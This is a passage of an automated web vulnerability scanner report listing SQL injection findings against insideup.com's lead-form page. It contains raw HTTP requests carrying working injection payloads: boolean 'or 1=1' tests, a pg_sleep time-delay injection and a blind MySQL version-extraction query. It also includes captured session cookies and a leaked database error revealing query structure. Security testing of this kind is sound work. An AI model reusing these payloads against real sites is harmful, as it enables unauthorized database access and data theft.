Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.170. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_393%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_393%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payloads 13891904'%20or%201%3d1--%20 and 13891904'%20or%201%3d2--%20 were each submitted in the attributeId_393%5B%5D parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders13891904'%20or%201%3d1--%20&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders13891904'%20or%201%3d2--%20&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.171. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_393%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_393%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_393%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders'&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ip76n259e5ijao3799t7t9g384; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated 24-hour&attribut' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders''&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:08:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6dlublmqcth6r1eu99d68lfhe1; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.172. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_394 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_394 parameter appears to be vulnerable to SQL injection attacks. The payloads 17633392'%20or%201%3d1--%20 and 17633392'%20or%201%3d2--%20 were each submitted in the attributeId_394 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure17633392'%20or%201%3d1--%20&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure17633392'%20or%201%3d2--%20&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
